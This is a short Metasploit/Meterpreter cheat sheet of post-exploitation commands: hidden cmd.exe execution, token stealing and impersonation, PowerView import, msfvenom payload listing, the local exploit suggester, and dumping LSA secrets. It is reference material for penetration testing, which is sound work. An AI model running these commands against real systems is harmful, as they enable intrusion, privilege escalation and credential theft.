Port Forwarding
portfwd add -l 1111 -p 22 -r Target2
Screenshot
screenshot -p file.jpg
Idle Time
idletime
Disable/Enable Mouse
uictl
Execute a command (interact with process / create a hidden process)
execute -f cmd.exe -i -H
Execute a command with arguments
execute -f cmd.exe -H -a "/c net users"
Steal a token from PID
steal_token PID
Impersonate a User Token
Spawn Process as Impersonated User
execute -f cmd.exe -i -H -t
Powershell Execute (load powershell)
powershell_execute "Get-ChildItem C:\Users\user -Recurse"
Powershell Import
powershell_import /path/to/powerview.ps1
Immediately Background Sessions
exploit -j
Set global variable
setg RHOSTS 1.2.3.4
Local Exploit Suggester
meterpreter> run post/multi/recon/local_exploit_suggester
List Payloads
msfvenom --list payloads
Payload Types
asp, perl, jsp, python, jar, php, linux (elf), windows (exe, dll, ps1, psh-cmd)
windows/gather/lsa_secrets
Dumps LSA Secrets. You can also use Kiwi's lsa_dump_secrets (probably better).